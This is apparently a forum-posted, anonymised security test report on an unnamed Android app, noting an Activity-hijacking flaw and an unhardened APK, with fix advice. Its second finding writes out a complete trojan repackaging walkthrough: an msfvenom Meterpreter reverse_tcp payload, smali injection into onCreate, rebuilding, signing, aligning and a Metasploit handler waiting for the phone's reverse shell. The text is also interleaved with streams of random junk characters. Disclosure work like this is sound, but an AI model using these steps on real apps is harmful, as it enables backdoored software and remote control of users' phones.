+ b4 @8 E; S- a& Y4 @- E$ X
% {; k0 T8 B# A8 l( ~( z/ K% n' O% q. o
2 W% H. e! u7 p' A# M
8 p' d8 |, R' _0 `! w& s 表1-2 测试结果 + {: D3 x1 x% N: K6 J! U& g
/ ^. i4 F8 v% l
- J5 Z( q& T( ?/ d
, O4 b5 [5 U3 G8 @
" t- L% `' \- E u
: t' Y9 ~! L' |% E) j 3 H: {! c6 t8 x3 P9 {5 `
# r# @8 q \" M( G7 ~
% D( d8 F9 C/ L! H
; K: K) f6 T+ ?3 F
$ t' w) H z$ s3 q7 [' Y0 G: u
5 m9 Z% q1 h5 f* |: n: t/ z 2 检测结果 0 D* H9 e4 s# v: B" E4 `) Y) k6 k
% s( ]# Q6 G/ G+ L- O
: b. }" L: @" z2 n; `1 ~( D5 E8 I+ s
4 u4 ?# |" W. c) f5 p! Q+ h- q
R0 S8 U! P! P9 R2 z) Z8 Y5 \" T 2.1 某某某
" a# b2 ] r- Y2 N2 _ B7 u4 E: O7 F1 h
9 O7 I [; Z9 \' R* R) D7 b8 U! n* z; F/ s+ y' s3 H
1 p9 ?4 p& f: b" G( |, }1 ?* f
2 w/ Y( [1 H @- R' V8 |, s* a- h/ a 2.1.1检测目标 8 [0 Y: _' d7 {6 h5 W
- h- J) s$ d, M' A6 H
2 X0 X) V2 @2 ~) ~* l" ^6 l
9 f+ `8 K0 ^8 b
: f; n8 `, [1 n$ t0 } V% k* Z7 t, \# O: z, [
目标地址: 某某某某某某APP
' w! K* Y5 J" I
) x0 \4 A/ t/ B, [0 N
1 s% ?; Y5 j2 g
% J7 d+ ^5 r% N% p" J9 P, }4 f3 u
% o: K3 r6 f% J% o* W
3 e+ p# R) g+ |' t" g 2.1.2检测结果
8 p8 R o' F/ J N9 h) }; O' _. n0 U. x
4 s$ c: ?0 f( h; a. J, }9 z H# i. N
3 Y$ u3 K2 z5 M
7 t) ~( A0 J% [+ r. Z- ]+ u& M 2.1.2.1
4 A8 j# [, _/ [8 k. r; h: q3 q& {- Z1 l2 f# u' z7 T1 d
/ E) @5 u8 ?9 ~1 ?8 u* t: L+ I8 z; M$ r
' ]6 r ?) ]/ k* g, J
! e5 B6 M: m. y" m0 O2 G! ? 漏洞链接地址:某某某某某某APP
( P# V8 s7 L" i" M) X# ^3 U
) m5 V* D n1 e* x8 _
4 V4 P' C' ^. f$ p% ?' Z) C9 U4 n* J4 f" c
' W3 T6 x- x4 L* S1 y w
3 S- Q# M! ?# Y* z
' ]. B4 `6 d* C/ E( E- l4 k
2 n% W/ r6 K3 q# u Z
3 D z' P( r7 W. I6 B _: C3 e" w# i% q
1 t# Q0 S* w% J! I7 J* _8 _9 s* u) ?
, i" N$ P( R6 e( F+ Y+ ~* a+ f5 U 漏洞分析及取证:
4 E( _2 Q: J- r, S2 U" d* }& x
g# d/ x9 d& ?/ b6 x
- Q/ r& l: R! ]6 x
0 j4 d/ t3 K# c% \! }) b3 e
/ i6 W/ d3 I, ^) l" u4 F, o$ H0 j d* J
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
' j S( M+ l$ @; M2 H8 |4 r9 w: {% a: Z, `& ^* ?
7 ]7 B. Z* M6 _/ Y/ |# }
8 e0 C0 `4 @3 Q # F; a4 }" S' N
" W" A) _0 H3 x' [: X 
- E9 t/ j$ P0 ^8 V& D% R& k2 ^- k# D Z9 c
+ g" ~( E6 {$ i
" G( ^. o. }- F
, Z( j9 _" }5 ^# N
' s; j( m4 D/ G/ q# \/ O 1 l3 j! b7 A! R2 \5 u) C
% u* Q4 ]( ^; C( }) S+ c3 X& t: g
4 e* n7 z3 e- Z3 d' \
8 s3 L2 \1 ?) `5 h* D/ b+ k6 D
/ q1 {/ B) a6 t/ m
1 N/ w+ p& m r8 l0 l7 Y 
+ W$ S, z) T' M3 J2 h7 X
2 I+ Z. X/ ^" f: {- q% I- u+ p
# \$ g8 P1 h0 [# E( m& G
) ^/ L1 v/ f+ @9 S- @
9 I3 h$ h9 f$ T' x( T7 u% I* X l# V2 T! ~) [% ^
; i! w' O1 U% R; V' a
+ Y( {: j- _7 H8 T% O$ \
2 U$ n6 c n7 d! `' n/ o9 I
' h! ]$ n4 Y( r3 X g
# Q$ b; u) I+ l) O/ t+ _) x8 }/ v' q4 m& s& J
& P& S/ I8 E8 b1 l/ X2 }* R& z7 \# g
* G! U$ A, N$ V4 k
' A1 B5 \8 _8 u8 k# ]2 q. ?; ^( I. v3 O: d4 r2 }
5 S" K9 O2 J! K1 f5 p' e4 g4 c7 @2 y
漏洞危害:高 1 N y: s. T. ~0 A4 F
* Y% B& Y. h$ L( S5 x( j+ H1 t
/ v$ Q# R0 H9 c
5 M3 d$ N# R5 r+ M0 _; a+ M
+ L. t* G* H1 Z9 S! H
3 i# Q6 W. S1 D9 C# O# |
6 d& f1 q! k$ c+ v3 c
6 D4 J' p3 h, O2 Z$ A9 ~7 z & W. S+ ^ X. w/ b
( q5 I( R! _/ q# j) G+ Z: J! n
6 H i2 q* x& \, }- |* x& x& s
E. M/ K; N. ]- D1 I( v | 0 L$ u! z7 H9 Z1 f- Z
5 |& k; V) |: E: Z& y! r& g
9 E X( L. O7 s) v( E
1 m N- x. d5 {7 l. L! P 严重程度 ; d% u1 d5 A6 @/ j* O- r4 m4 |5 g
4 e0 [9 i: A0 ?: z" {
Y- P) Q/ |( S; T! t$ [
4 A+ O" Q) ]3 ^2 @! _# n
|
# j: S$ \1 h( a
0 j& z- c4 [7 A ! A( N: z/ Z6 i, L( Y
1 l- p* d6 @( i1 k: u+ }% U4 g# B ) I+ `' L3 u9 k1 j, C: z
, X9 i9 Q! H( r/ I4 h9 K0 Q9 l! R) J 高
+ l0 ^! `2 H8 T) j! x5 R
6 V7 B9 W0 D' I+ M; c
' x. v! }. E. a7 c2 Q6 R" R6 v0 e' T$ u s' |/ e8 v" G! ?; t
| * _) q v- N- g' n
* \: i+ _& H& Y' f- U$ o
. C$ }9 R5 {. R; y; `% d3 \* B: {# h* Q% a0 a" }- J
: A. o6 z5 |! J0 i
4 S" W+ q" C. y) V6 U9 n6 Y ■
1 V6 l6 V. g7 N. {: C2 h/ j
: W1 @& r" X+ {
9 F' R! X' ?9 v T8 g: ^
/ _+ q7 g$ r- G! S1 { | $ }0 m9 L" `2 m" U$ p/ a
) c7 L1 \& C# Z% p# F
8 @2 \' [7 w! o1 F8 ~! `( p3 X! z) [/ Z" {8 ^' m, t
# w4 H% [, h' [# `
& q" {; _* B& v; h, O: H0 z
中 ) P/ V% I: }$ `* _' [- z+ j- ?
( ~0 b( T! Y9 D$ f% \# @
2 u$ M, T$ H' y1 j$ a% [
0 @; A" a" K5 r" M. g* m! X |
. G% I+ G: ]" h' V
& p/ |5 b$ q1 i' B
$ W2 K: T6 s# v2 O9 q4 @, g) T
4 g# ?. Z1 E- A( J. l' v % i# @' m" V* m6 P' N7 R* d
% o+ G- H4 T$ \9 u
( o6 x) c; b6 B0 q6 V4 `6 \' n( E
( ^- V ^+ Q' Q4 H B
8 W V3 ` }+ L4 a) ?' x# w, {$ O; M# h1 a
|
) O- [* s) [; b# }! Y9 _, ~, r: N: M
1 U8 H/ ^8 g, w8 J/ G% c" G
' ?) O( m5 y* K) r5 f/ e% C
" p4 d' A0 A1 T
5 H$ V6 N# t% H9 [; Z4 O
7 ~6 `! c; A4 e9 v 低
1 p) E8 A1 a: f
( p1 b$ J5 b2 Y9 Z* H# E ! P( p, a9 T& L. x1 H
+ k) u! s" r, i | & ~. R) @6 q4 y+ N* ^; V. i9 {
, l6 ?5 v1 y( _& _) h
( C/ u' O" q g3 O$ l
* T& @6 U* `3 i+ B" t* _# [7 B 4 y$ Y3 o2 _( R" w; j$ O
: X m* A9 i0 E
% J: c! x Z2 k- C, \5 x4 K# d
a; O/ Q3 [% u5 x ) {* K' \+ M( I4 H
% z7 F! _' k4 L { | ' z# T6 [$ E. A* A+ b2 z* y
+ m, D/ S$ E$ u/ e8 S, _! E
" F9 r" k8 ]6 z' @* A% F
: Y/ h/ ]$ {& M. ] : N9 [/ [3 Q3 M* ~+ f+ x2 q8 D
3 U8 g6 @2 D" x1 T8 L2 @
/ q# X' ^8 |+ {( [! N
1 t! Y0 R: K0 M) L# y# Y ; p F/ c: ]5 n8 ]1 R/ |3 `; }
1 P- C- U: K( Q$ n: K' X- A
9 P( Y0 I- U' W
: j+ d8 ^ o/ o
h& q# j1 V5 |7 `% k! ?$ }9 C8 M; A- ?$ V
+ o4 d! ~3 A8 V7 k& \& P8 p& x$ N# V) ] s& F! E: D
. R1 Z: q/ T4 t5 o) }% y
8 r: v2 g0 M- p {) ~ 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ' {2 E6 A/ l2 l# K' ]- J c
7 u/ G3 z N6 i1 w
1 _7 E3 q: _/ a5 y$ L) N
* W. m* `/ m* Z: E# f3 B7 L
5 m( z) |8 f! ?; j" |6 j, g, p1 Q8 C3 y, j0 \ m% ~+ V) ]& O; S
) H, V! E2 M I! O7 C8 z' W
/ J# A, _5 K; v7 m: D
* s# Z+ l9 u$ L `- T- ^5 l* y: A( h6 t
( l' _9 f. C& y: }
+ R/ s$ B" x9 B5 d) f6 b, R) w3 K
0 V l6 u! y; r& [, ], l$ m3 L# |! N# E! ?- p" f1 T& J D& s
$ X1 d5 l! D& h$ x# F* h- J) q
! b) E6 j, Q9 h* c
: `# Z: I- j. H3 i6 ~- o3 C& p. ^ Z5 c2 D0 h
2.1.2.2
$ u2 F1 M6 [, m9 x) f& @) S ^0 f, {0 s$ v0 L/ i7 J) X3 `! M2 g- m, L
4 g$ c i; ^& V9 I5 n" l: t( H! N: L6 R$ Q( T0 ]* A
" N( \4 ^6 K% x( _
4 q8 g5 e! E. p6 p6 _. i
漏洞链接地址:某某某某某某APP
9 _& H" k: n* j5 G! z- X/ i: d9 H8 G+ V/ q! w) |0 E
+ Z4 E2 |8 `+ K. q# P8 G
. g2 b0 l9 g! q! N( l* s 4 h* s- W1 b2 Q0 d8 C* _0 a* \
y w; q4 ^3 C k
漏洞分析及取证:
- l7 [; x' G9 k5 K/ r
; _+ u8 w7 B# R5 H
; W. u. E5 J. O2 G$ n) A, l+ R5 ]2 a
% _ B2 D1 n! _5 B
- M* h. W- y1 K% e: f
9 t t$ s* g- M5 U 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
3 j4 c4 R# P: d* H
, @' ~, V; _+ _4 y t
4 N7 ^5 O7 `. O5 t# |
6 x* s( K5 y) Z; ?
7 S ^4 R' g" B1 }3 J* h) }& d. `' X: b, r1 E: V8 ^) v
用Metasploit 生成木马 apk
% z7 g% A j, x8 z! y! _) p. h2 b: V* t9 G( V" O4 C- x8 |9 V$ k
% g, T0 w+ j' h9 |! q
3 w! _1 {' V- o: O! y4 w
! L- {9 E( J" |$ T/ p! V1 v4 R3 L! e$ T- v" R0 c" t
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 3 `' B8 a( t: e( v) j; @
& x) a3 [; P4 N) O9 h
: a# |- ^" z$ I8 I' Z
. t! C+ ^/ ?6 R) w$ \' _) }
& E. L8 m& N* G! q9 [9 F
& h; ~ x5 `- U) f 反编译目标apk和木马apk $ _5 ~6 U. g3 t3 [
& J. v# n* k* \2 {3 d
! S/ _ i# x) a. N" G6 t- o7 }
. f2 }. _# U1 N
/ z2 u3 l( t+ S7 U. h: r& |7 h, @6 d7 d. ~- n
apktool d target.apk
1 N, u, O( K% T: ~- I/ T. j/ O c: O) }
apktool d cockhorse.apk ( h9 T8 {# n5 R: z- K& ]! Z
% R+ \1 M; {& C/ }' y7 u. Q7 z4 B
7 _. b4 d6 P9 a6 r( I
7 T" N! a/ j9 `; q6 @2 \' _$ n8 E! F
2 A1 v: S' P1 Y4 t
7 k8 N; t+ |: F# u& ^( @& j, M: p 木马 apk 注入目标 apk
* Q- @( u. ?7 g+ [. L, S+ n. u E' M* \( I5 q z* c5 g+ h8 Q
# T. |# t1 A) ?3 s) [. _; {, {+ G
/ ^, s& Z+ f3 h) N: O ) \" z0 `! ]7 t! U
$ k ?2 f# c* l ?" Z
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
. I* }( w& P9 i5 G, k0 Z
$ c4 o6 I$ T3 L( u& G [ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
% k9 r/ [% c& h8 T8 }: e/ u( T: W' O+ W% P, v
N, ^1 Z A: c( c' n
E$ n# R! x8 [% Z" Q) i4 D
# ]2 c5 c5 Y; W& ?5 E& U% T
1 r9 O' _6 `4 v/ v! ~# W 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 $ D! }" W0 }2 P7 J# D: r
7 g+ `3 T0 Q5 v, {1 r
3 t' w4 x N" P! y! Y
; N) A: V& n, w2 l& Y, s
) Y7 o \4 X% [! R. `9 E5 R! T9 x
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
6 U, w( S0 L$ B7 k# I
7 b- c9 p. _! l
! w" g% {& B( p: k! a5 i
$ ?# ~/ }: E+ T' Y* b6 V2 u
4 I( {9 D' o! y, l
, Z4 B# d7 ~5 C6 n 回编译生成最终 apk ( w; I$ ~1 e( O4 D$ K5 y
1 B$ D' o6 ?' ]
9 w- J% M" C7 Q# A) o
2 ?# {4 S# o7 g- ~; r- [
0 W W1 ?+ Y) u Z+ `5 t& |
% @: {9 ~* B6 j: a: v
重新打包
% l% W6 x7 P7 }+ F$ `+ g+ H! u$ ~( I- ~6 C! S4 V/ l% t1 t
' q% n7 N1 V6 O6 R5 {# B. x8 f/ ?& Z. |( b
7 ]: {, y! ^. L, n- W- r: h, l: Z0 c% j9 o. Z# O% [3 h
apktool b -o repackage.apk target_app_floder
L. h0 f' o+ `* L
. }5 ^) ?& B; ~6 N3 g& Q
5 m8 @# D5 Z" g8 Q8 s6 f
7 F: Q3 h; ^ I9 W5 t* B
; J/ U& B; k0 V' S& M
, x; m& ~. K' k5 [ 创建签名文件,有的话可忽略此步骤
1 t7 s, Y/ e: g; T% L0 V1 t! v1 C; d7 S( f" m1 \; X
: \1 U& ^9 t. z3 [' O ]2 ~
2 K4 `" I/ ?6 u- y: F$ N : x ^: g6 [( Z
: B& E7 U+ p. @
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
# j5 V0 m, [' i% ]6 B/ {5 _( q) K% d* x) _ B4 A; W3 Z
/ s: O. S2 J3 V+ ^1 W* C( ]* E
* W) }. n. |. }( Q* c
" B- }( D5 ^7 W/ l7 \: `- E1 \7 C& t: y+ w k+ A+ `- V
签名,以下任选其一 " [' w) M% @1 v+ N6 {9 A* a* Y+ q
' G, \, i: Y ^6 u* Z& i W8 s
+ T# A; U( O4 L! n' K
" d1 V" ?7 f$ j5 B# M- |
) }5 O4 E) [* N, ?! Q
" E2 y' y2 M `
jarsigner 方式
3 t. M1 d2 E! S$ |, J" F, ]
: G, a. O/ i- a# v2 _
3 L5 |% @6 O& I& T; Y2 T" j: ~% o: l, f, e9 X8 x
/ C9 }: L* z7 D3 |- D6 @! l
* {+ V, N. i0 w' X6 X7 A
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname + N. I; D6 ]7 v1 H+ o$ I: `
2 P8 U! I( M* }' F- V
) {7 p$ ^5 P# }
& @& f; B8 o# X* p% I& Q ) x: D+ M; n' s; v1 H% a: p% E
- k7 v( t( K7 W4 a/ W/ O, J4 ~2 |: k
apksigner 方式
4 U4 R# \0 H1 H. ]' T2 }6 i% y3 N0 `1 a4 }8 v. V
+ J# w E7 g' V- V) ~7 A5 K# v( ~' x$ n7 d& @; q
: \. D% f6 e5 }* B; P& V
: U- R' i8 d8 ~5 ]0 G( |. B
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 z% j6 B# p/ o( Y5 R, I
8 L3 N B* P! T! ?0 M* j9 |
0 s8 R0 i# j9 v$ O$ B
: ]5 J* U* `+ q. e; L) y. S9 y) D
1 z, ^ g X3 z/ M' ~' ], `0 p" f2 f6 _2 c$ x3 M# _
如需要禁用 v2签名 添加选项--v2-signing-enabled false " _$ c; x9 q4 ^+ @ X7 @; h6 N
" c+ g" i6 u6 P$ S
9 ^; n0 W& S! x
3 a* {" R% b/ y7 @ 4 s1 p: Z2 H5 Z4 h( {
9 P- C& T. |, }/ o1 `3 ]% c 验证,以下任选其一
L- X8 f7 A0 R& m8 G/ p( v( q: d3 c- Y
: L! Z- \& e5 ^' o5 I% E( Y7 s
% T$ M5 N& \& F5 O3 q; F
3 f$ g3 V$ x; d2 V7 M l4 \3 M
6 p" k0 }& `% B* } jarsigner方式
$ t$ V7 i' p0 U1 v# V( Q
& O/ u8 u# h+ j: s, ~
) G L/ w3 p2 |2 I! p5 c
& S& B. I+ s$ h% J& P* c& [
9 C" Z( P8 X8 Y4 q$ t- U$ T* d+ ]& `3 @
jarsigner -verify repackaged.apk ) a+ j9 a V- f! d. W8 d& m
! b# x/ M! A j4 D' P( l8 r J
@ G8 p: \. f5 N$ M3 z( F: V& ]8 C
3 t' H* m0 j8 o4 o
6 R( G7 t; M3 Z! X! o! k
# L4 @6 F M$ J3 I0 o$ I3 U v apksigner 方式 % L) {. o) M+ P- F1 ]0 h# q) s7 t
2 S7 n' U' [' H8 ?7 ?4 e- [' t
2 J. p% N. h' Q
% O: c& Y$ \. K$ I! @ ) o8 }8 v3 F8 V( S
) Q2 `# F' g; \2 [9 O6 e apksigner verify -v --print-certs repackaged.apk 5 e, {: M5 O9 v6 }3 G( @8 K. Q1 x
* p% L, Z+ f3 F9 `' F9 j
T3 j A+ X5 |) {0 e
9 [- W6 z4 \' o% D; B: k# G: ~ ! s3 I- s4 S9 J7 ^/ g
* h4 z* A8 H. m1 u( E# G7 c keytool方式 & e% M( k* j) f- n" z
" c3 P) r; K1 o2 c* @, n7 ?
. _2 l" R1 W4 D V6 Q
/ F1 {1 ~$ F/ Z7 @
0 G+ a( [ v0 M) t
. v) U( q9 Y6 R2 o W
keytool -printcert -jarfile repackaged.apk 7 x: H) A! a4 G+ S u: n9 F3 C
2 F# [7 E. Y! v9 O5 J
# l; D5 P- b- }9 L8 }; r ^
4 p0 z( _2 C; ]5 m8 z
- U v- Q7 a8 X- i2 Y6 C0 J1 K9 c* V1 n2 `: \# s
对齐
2 ? F: _$ h. _9 B ^. y
% g( Y. v2 H, W7 h
M) h( _7 L/ z3 M
/ h( D$ ^. U4 d 5 n5 h+ a$ D: I/ ]! s0 C. Z
( a: w) ^+ W* J5 I# V 字节对齐优化 % T9 t1 `! x0 _: W6 D/ u
4 @. C/ ^& O2 \
4 N( l& _( m1 k
4 L2 H8 S$ e4 I7 R 0 i. M2 Y6 g& a8 }3 c. \/ t
5 ^4 N- \* @* q2 x! } zipalign -v 4 repackaged.apk final.apk
- O1 e0 @! o3 _0 q
" g" Z% k5 q% d, Z' i2 o7 `! I0 K
' l) _ s. N* }, s& A7 L; M
9 X% C5 u( o3 ~2 z9 ~# d, d: K9 H ' S0 \; ^; }$ w1 ]" Q1 m
6 h# q% X1 p1 y' }3 O 检查是否对齐
' |7 q# R1 |+ ^+ Y. T" R, z2 {1 Z( j
/ u8 f# S& ?+ S7 \! |
( m4 A5 |0 N2 Q H
" y8 u" g _4 v* Q! x# s
( W' Y/ ^) ?$ j u: j zipalign -c -v 4 final.apk
7 m# m7 e' S, e7 I
( M+ A1 o( c$ I/ d2 l: Q% y! M
5 Z6 q" k; l; A# q; c3 ~, o D y9 a5 C% _
# p/ q4 i# x8 n9 Q" |3 |& {
9 r1 u( t# w: E. | 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
6 X, U3 _: c9 F( i
2 @' c& G+ ]/ I; l0 _2 n" `
8 P2 ~* y# q+ Q e% K
$ b( w/ p- R. _$ z9 ?5 n) ^ / y8 G8 _* d4 ~3 Y# }" S' t
* B/ I, {! `. f3 V' G [5 z8 t
启动Metasploit控制台,配置参数等待上线
: j" T _. h1 U- J! m) K
1 j4 W2 A& h a) T8 t
4 o* P5 \7 l3 r; P$ v/ S6 m
* \: P3 p6 e- L. m8 A0 p ; F3 f C7 O/ X8 t0 o* m) n
, O3 h( D2 J7 l: J% B
在终端依次输入如下命令
W5 L' K- q# d e8 \4 C3 z9 e1 W p7 J; U5 Z3 O& L
5 R, g5 f; S+ q8 _: p
# B; v( n1 a' |$ C% \, k B0 z& [0 K7 R7 Z
) C8 X( E' I% b/ @6 \$ f. ]$ ~
msfconsole
& \5 C" w V H) A; ?) _' T7 `: H/ r0 D! M
3 @+ c" r, I% ?1 d
3 o( h$ n3 s t& b5 ]1 p( r
" n0 d D {1 r; g0 Y! S
) V! n; V, ^0 T! m7 _ use exploit/multi/handler , }8 m( J9 y7 V0 E+ h
. G- }( t! y! F) }, L w( u' R+ e
: @! f/ Y( ]% ~3 H" M
3 x. J) a* \: ?& K7 E' M- {
7 R. @$ n* |5 ?) D- o. N ?: S/ |7 z7 @, F G( p2 ~$ V, v8 B, C2 T
set PAYLOAD android/meterpreter/reverse_tcp
- k9 n1 N- Y* m% {+ y* G5 N% G
: g' J7 M/ t+ i
6 t7 q5 Z4 A. w V# H6 Q) P) T. S* W/ L- A2 l, c: v! T# J
7 v; M5 T8 _* N- W0 s
3 {8 Q# W8 U9 ? set LHOST 192.xxx.xx.xx ( T( R4 x( B* l0 I/ |
5 i( K" n0 `- R* s8 ?
# n. q+ Q B' s0 K+ D) W7 [
3 d3 E/ f) j$ m7 l
/ x# o1 k4 @9 J$ b' N+ [5 r/ `
1 a& o+ y8 H& F+ X6 R$ ` P set LPORT 4444
; G* ^0 U8 {, r# i
/ l& I% O4 S C2 M; f" U, x
5 L. h; y3 {) ~6 E$ c1 ^ n: @4 Q" R6 c0 A# Q
0 R# E# C4 C1 X) p1 U5 U. h9 j8 F/ F2 `+ {7 N
exploit
. F5 S: Q- f, I3 u4 c F
7 g% x* z1 M5 }$ a0 J
3 z; x( F( X" o: u+ U+ c+ m; f3 W
# q5 u0 U+ I2 w1 t; V9 j m. F
& h. c. E8 r1 Z+ C, u
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
: Q* J+ J& L$ d' I
: ?6 v( e8 F F# {
1 q1 k- m# ?2 Q9 f/ o! A) v
( H0 _; b( h$ s+ j* E$ L$ t 6 ?7 ^. `5 V% v
3 S/ [; [2 }. H- L( X
漏洞危害:中 1 [: w N9 H n& g* G) w, w4 ~
3 f) j' w( x6 Q8 G7 ?0 E6 Q* S8 C
5 y/ Q! B- ~: C* q
+ z3 Y! z1 e4 G5 ]; r1 ^' T( i+ U - d" w% O0 {% w0 b: u4 ~
: M3 U' d0 a, @
% Y2 P' z. {& r, V) o" ]2 A6 a; |" u9 n( p0 L6 `6 f) @
3 ]& G" r8 [- P+ J
# d2 f* x; e* Z7 F( `
( ]& Y" V( R/ n. y
" D1 j0 e# K$ c8 C3 X . H2 i! A8 _) q1 P8 H
) L+ z- _$ y; \" A" Q. M
| 3 J k+ [1 X4 Y" s( n
6 i8 f J3 ^/ p1 G! m ' F# \( q" B( |" r, u
1 G, h, `8 Z0 S# L( _4 f6 h
严重程度
: U& K. P6 i0 Q- J' E
; w) a6 z7 e5 S, y7 r1 C % A% }; o5 B% h# d; t
, H# Q# \/ s6 Z
| - ~7 E/ `8 A& P/ g8 b3 E( X
0 L# `4 L1 x1 z" Z l, f# U& h
3 ?* t" s; m. d/ [1 i
. o. a7 v! G3 ]; l/ \( H' s9 O. p
& B, {4 L% l' W
5 W( q3 z4 {5 ] x( r8 j! Q 高 2 Y" D+ X: W) t
% N6 w0 i+ j: }6 X) ^5 ^
1 M; d# v9 a* w& p% G: A
4 D# b* R- m8 m6 e8 f( J |
- }' C' R7 `# H. R- A! p3 M7 H Q* I
! X/ ?) a$ K, I7 K! b
1 O! s; _) ^( A% F
( n' }9 A) d2 k3 ?4 Q- k 5 ~( s9 t# K4 |
0 }. t# O- n! v6 r+ ?, e
■
7 T% p! [5 ]8 a/ T* [
, i8 \3 {6 ~+ V8 b# \
' g1 p1 G- |. l2 N, T: y0 F! N$ i' V7 |, ~+ J$ n
| ( ]+ t$ M+ _: t* f- p. G
+ G& l0 D# t: V' K4 _
- }6 J7 n1 o% o; d3 _: O, x3 m- R/ a4 z: v9 E t5 l
% _; V) O6 `5 n
" u" A: U' p' S6 ]2 n' _% L 中 6 M0 C% E$ u+ R. F
) g' F; k3 S" |8 j6 N: R% Y9 {
0 t7 p4 ]5 \2 v8 r p' y3 E% H. w8 ~7 O5 U
|
3 p$ o7 a/ \8 K: y1 H4 `$ }7 U( G
, ]( f0 T, G$ ?: d
$ U, m8 d* N# X! I' E$ m" y% D! i ^# j* O9 b; a
1 K, l: Q9 S5 K$ ?8 s5 {
8 I. Z% q T% r* y8 ] u; k; B
- ]+ }) m# m3 g" S# a* P! F5 h
: o+ L' @( A' T" S o) y( M 6 O1 l5 k3 f$ {
% Z8 o- N# P6 @/ c: H
: O+ I& \4 s4 V( ^$ D& X2 Y" ~ I/ _& \' F7 H
|
1 o3 ~9 h8 m/ D) s2 k) U/ F3 Z
0 V5 |' D- o$ d$ R' } 8 `- M1 y6 U$ D! x7 Y* W) n* \
2 L: l+ a1 J( [+ b/ X6 L) i! @6 k
/ j* r' G2 n, @1 n l) w$ R% E5 Z7 A. a h7 H
低 & E9 z, Q; C# r# l- G
- k% [; |: n- ^/ a" [( [# d
# H( _- @7 X/ c) r ?! i
" t0 R0 S* y* Z, L8 C2 ~6 |+ h
|
/ ^. _- ?! r& R. a3 M0 N
; D3 i# m! c3 O+ d% Y - N( @( _$ k% H; c% T
# e/ H5 h4 ^' |' K. p 0 Z V) G7 G/ A8 V7 |1 R+ k
. @ t0 n) h4 C* o/ B# y ( m* Z5 I$ C) j5 S2 T" z2 V
+ z0 U: S6 Q6 }, \3 a) w9 c1 Q ' c% `5 E/ O/ D8 Z
# L+ _8 F& S1 V" d% z1 u6 C. ~
3 A. w: F2 L/ ]9 P. p9 k3 |: X
! ?. [8 {8 \; }& u | 4 t) V- Z* r6 e# u3 b
0 s! e" q1 F q5 f+ _' r7 C n
1 g3 I, l1 S2 c" ~2 f
( A. i! Y, w: I$ J6 G , O4 K8 `: p; l" Y, s
2 n {. s0 ^, h
) J1 y G3 Y7 |% A8 A- U3 W- \
5 d" I& P4 R; W/ e. e) U3 x
& C3 X; P+ I1 g) o/ k3 p+ G* t# L8 v# L/ U: X4 h& n: r/ K
3 S, t1 n$ b+ U5 w
+ N% h7 u" V1 E- c# V
% G* x9 l, m2 n% b6 \( S
9 \; z6 H A+ T/ a- `# K3 I$ G
, P" \/ x/ G* Y8 t3 Z
: O/ Y" R8 A4 Y3 V: A/ z0 h
$ {1 W! a; d/ W; P* b% n
* [7 W4 [8 g% }' \& x4 ^ 修复方法: 1 [8 d# n" { n) L# A1 q( Z
- x% n- ?! x4 E4 X- ~% m
0 T/ {3 l; P# m9 R
; B, b3 o+ [, B6 G' L8 U! r: u# K
+ b7 j0 b; F6 H# s+ n! y
* H5 _7 |5 m& F: ~: u' F4 K 1.在 APP 启动时应做签名校验防止二次打包。
- U8 I# ~# a0 y9 a# p8 }# ?$ l0 _: K7 X# r/ J1 x9 K
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
& d3 q3 `2 M* q1 r1 p3 g2 L& |- q) b1 ~! D6 Z5 L; ]7 x0 P: L" }; f* r* ]
1 ~ u/ R7 w% }. v4 `6 f
( I. o2 s; @, }/ k; W
. l9 } q) W$ \8 P' k1 [: a! q
9 S9 w! K$ a$ l6 T) v* Y
" A4 b9 k9 g7 k' \4 ^8 A% f" f
7 a' y+ O+ ^+ o+ a D8 Y! O" Q4 e ]& @6 c9 C
/ J5 G- G% A# W4 Z- V# x) d+ ^
% p9 S' c2 U) X4 H2 w0 ~ D
3 K8 g- _/ l( ?0 l
" v# a9 d) R6 E c$ b; F1 s% T+ a% s, p# B9 f
& V& } {4 {4 b1 R) K3 n6 g& X
0 w. Q5 c! L1 ~4 ^$ A
* G4 G: c# u; V+ a# l6 x4 g$ `/ U5 b' d6 W( \5 M2 [9 s; d
6 v/ d) N; F. z' B3 k; W$ y2 ?# ^+ w- B Y+ b1 r3 j
发表于 2022-6-8 20:32:44
收藏
支持
反对